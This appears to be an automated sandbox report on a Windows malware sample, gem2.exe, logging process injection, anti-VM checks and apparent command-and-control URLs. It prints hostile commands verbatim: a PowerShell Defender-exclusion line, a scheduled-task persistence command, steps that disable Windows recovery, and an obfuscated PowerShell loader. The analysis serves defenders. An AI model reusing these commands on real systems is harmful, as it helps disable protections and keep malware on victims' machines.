Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B848 FindFirstFileExW,17_2_00007FF7D168B848
Source: lsass.exe, 00000039.00000000.1517744463.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: VMware
Source: ReAgentc.exe, 0000001E.00000003.1452197237.0000021ED6EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: lsass.exe, 00000039.00000000.1517744463.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: vmware.exe
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drBinary or memory string: qemu-ga.exe
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: TEMP\.exeWinDrive-.exeC:\Windows\System32\System-.exeC:\Windows\SysWOW64\$LMX-SOFTWARE\$LMXconfig\startupSysWOW-.exeC:\Windows\SysWOW64\$LMX-.exeC:\Program Files (x86)\Microsoft\Temp\Microsoft-C:\Program Files (x86)\Microsoft\TempSoftware\Microsoft\Windows\CurrentVersion\RunMicrosoft-://httpsABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/https://pastesnap.com/https://deepseahunter.com.de/https://projectretrac.com/https://brettdogecoin.com/https://syncaicloud.com/https://eonfortnite.com/https://RusTechHub.ru/https://creativecoder.top/https://namesell.sbs/https://LearnToCodeWithUs.su/https://burningspice.cfd/https://securetextweb.cc/https://wildlify.com/https://spokoystvieidusha.ru/https://adorebeautyz.top/https://indexinferno.top/https://SuccessFromWithin.ru/https://TechVenturesFromRussia.su/https://inforte.top/https://YourNextBigIdea.su/https://bluebullet.su/https://flixmi.top/https://leadingworld.top/https://FeelGoodForever.org.ru/https://RussianTechInnovationHub.ru/https://coolcarforum.com/https://russianculturalheritage.ru/https://ExploreRussiaBeyond.ru/https://wavepassage.cfd/https://tiffanyonlinestore.top/https://galaxyglimmer.top/https://CodeMastersHub.su/https://LearnToCodeWithUs.su/https://gamergategames.top/https://jobscontext.top/.exeWinDrive-URL Checker:////.exeC:\Windows\System32\System-System-" /SC ONLOGON /RL HIGHEST /F" /TR "SCHTASKS /CREATE /TN "SystemManufacturerHARDWARE\DESCRIPTION\System\BIOSVMwareVirtualBoxQEMUMicrosoft CorporationParallels0SYSTEM\CurrentControlSet\Services\disk\Enum0SYSTEM\CurrentControlSet\Services\disk\EnumVMwareVBOXQEMUVBOXVMWAREPARALLELSvmware.exevboxservice.exeqemu-ga.exehttp://www.google.compowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"Global\e788d6624aWaiting for Internet connection...//M.txtSTB/Global\f4855f59e0Waiting for Internet connection...//M.txtSTB/TEMP\tm
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: VMWARE
Source: lsass.exe, 00000039.00000000.1517744463.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: $LMX-f4855f59e0.exe.0.drBinary or memory string: vboxservice.exe
Source: svchost.exe, 0000003A.00000000.1522768743.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549880016.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1517471519.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000002.2548700013.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003A.00000000.1522768743.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, curl.exe, 0000003C.00000003.1547952894.0000023245FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dwm.exe, 0000003D.00000002.2572338533.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: C:\Users\user\Desktop\gem2.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A9688280 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F5A9688280
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019FE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,16_2_00000173D019FE30
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A96814A0 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,9_2_000001F5A96814A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968CE44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F5A968CE44
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A96885E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000001F5A96885E4
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DDD88 SetUnhandledExceptionFilter,14_2_00007FF6A54DDD88
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DDE08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF6A54DDE08
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54E2DC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF6A54E2DC8
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54DDBA8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF6A54DDBA8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC522E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000173CFC522E8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01BA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000173D01BA8B4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000173D01B9E30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03B85E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000173D03B85E4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BCE44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000173D03BCE44
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03B8280 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000173D03B8280
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166DBA8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7D166DBA8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166DD88 SetUnhandledExceptionFilter,17_2_00007FF7D166DD88
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166DE08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF7D166DE08
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1672DC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF7D1672DC8

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\gem2.exeMemory allocated: C:\Windows\System32\svchost.exe base: 173CD230000 protect: page execute and read and write
Source: C:\Users\user\Desktop\gem2.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A4590 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,14_2_00007FF6A54A4590
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2C98
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22C98
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2C98
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1CA2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BA23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28C23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25C23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BF23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14B23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28223B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12F23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F223B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7623B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25223B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29423B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26E23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FD23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26823B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10923B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A723B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6323B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7023B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B123B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D523B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10A23B3
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 337D2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DE52C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9652C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A25C2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D0382C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 164F2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D2E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 381E2C98
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 38212C98
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe NtQueryInformationProcess: Indirect: 0x7FF7D1632286
Source: C:\Users\user\Desktop\gem2.exe Memory written: C:\Windows\System32\svchost.exe base: 173CD230000 value starts with: 4D5A
Source: C:\Users\user\Desktop\gem2.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2AC381E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2AC38210000 value starts with: 4D5A
Source: C:\Users\user\Desktop\gem2.exe Memory written: PID: 7788 base: 400000 value: 4D
Source: C:\Users\user\Desktop\gem2.exe Memory written: PID: 7788 base: 401000 value: 55
Source: C:\Users\user\Desktop\gem2.exe Memory written: PID: 7788 base: 402000 value: B8
Source: C:\Users\user\Desktop\gem2.exe Memory written: PID: 7788 base: 404000 value: 00
Source: C:\Users\user\Desktop\gem2.exe Memory written: PID: 7788 base: 42A000 value: 00
Source: C:\Users\user\Desktop\gem2.exe Memory written: PID: 7788 base: 302D008 value: 00
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4056 base: 2D10000 value: 4D
Source: C:\Users\user\Desktop\gem2.exe Thread register set: target process: 7628
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1252
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: shared_ptr,GetModuleHandleW,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle, \explorer.exe 14_2_00007FF6A54A20A0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: shared_ptr,GetModuleHandleW,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle, \explorer.exe 17_2_00007FF7D16320A0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumber
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumberJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc /disableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:etrmmuykmezi{param([outputtype([type])][parameter(position=0)][type[]]$lqotnkeziwxxmy,[parameter(position=1)][type]$pzbfqvixvd)$sbbqvxxfari=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+'e'+[char](102)+''+'l'+''+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+'d'+''+[char](101)+''+[char](108)+''+'e'+'ga'+'t'+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'nm'+[char](101)+'m'+[char](111)+''+[char](114)+'y'+[char](77)+'od'+'u'+'l'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+'e'+[char](108)+''+'e'+''+'g'+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+''+'y'+''+[char](112)+''+[char](101)+'','c'+'l'+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+''+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+''+[char](44)+'s'+[char](101)+''+[char](97)+'led'+[char](44)+'a'+[char](110)+''+[char](115)+''+'i'+''+'c'+''+[char](108)+''+'a'+'s'+[char](115)+''+[char](44)+''+[char](65)+''+[char](117)+'to'+'c'+'l'+'a'+''+[char](115)+''+'s'+'',[multicastdelegate]);$sbbqvxxfari.defineconstructor(''+[char](82)+''+'t'+''+[char](83)+''+[char](112)+''+[char](101)+''+'c'+'i'+[char](97)+''+[char](108)+''+[char](78)+'a'+[char](109)+''+[char](101)+''+','+''+[char](72)+''+'i'+''+[char](100)+'e'+'b'+''+'y'+''+[char](83)+'i'+[char](103)+''+[char](44)+'p'+[char](117)+''+[char](98)+''+[char](108)+''+[char](105)+''+'c'+'',[reflection.callingconventions]::standard,$lqotnkeziwxxmy).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+'m'+[char](101)+''+','+''+[char](77)+''+'a'+''+[char](110)+''+[char](97)+''+[char](103)+'ed');$sbbqvxxfari.definemethod(''+'i'+''+[char](110)+''+'v'+''+'o'+''+[char](107)+''+'e'+'',''+'p'+''+'u'+''+[char](98)+''+[char](108)+''+'i'+''+[char](99
)+''+[char](44)+'h'+[char](105)+''+[char](100)+'e'+'b'+''+'y'+''+[char](83)+'i'+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+''+[char](83)+''+'l'+'ot'+[char](44)+'v'+[char](105)+''+[char](114)+'tual',$pzbfqvixvd,$lqotnkeziwxxmy).setimplementationflags('ru'+'n'+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+'n'+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $sbbqvxxfari.createtype();}$molktxqtnxyrw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+'st'+'e'+'m'+'.'+''+[char](100)+''+[char](108)+''+'l'+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+''+[char](114)+'o'+[char](115)+''+[char](111)+''+[char](102)+''+[char](116)+''+[char](46)+''+'w'+''+[char](105)+''+[char](110)+''+[char](51)+''+[char](50)+''+[char](46)+''+[char](85)+'ns'+'a'+''+[char](102)+''+[char](101)+''+[char](78)+''+'a'+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+'m'+[char](101)+
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: 14_2_00007FF6A54A5790 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 14_2_00007FF6A54A5790
Source: dwm.exe, 0000003D.00000002.2559217301.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000003D.00000000.1539424742.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: winlogon.exe, 00000036.00000000.1514410489.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000036.00000002.2551678749.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000003D.00000000.1541202324.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Code function: 9_3_000001F5A9663290 cpuid 9_3_000001F5A9663290
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 14_2_00007FF6A54FF600
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: GetLocaleInfoEx, 14_2_00007FF6A54DC884
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: GetLocaleInfoW, 14_2_00007FF6A54F4750
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: EnumSystemLocalesW, 14_2_00007FF6A54F4210
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_00007FF6A54FFE64
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: GetLocaleInfoW, 14_2_00007FF6A54FFF14
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_00007FF6A5500048
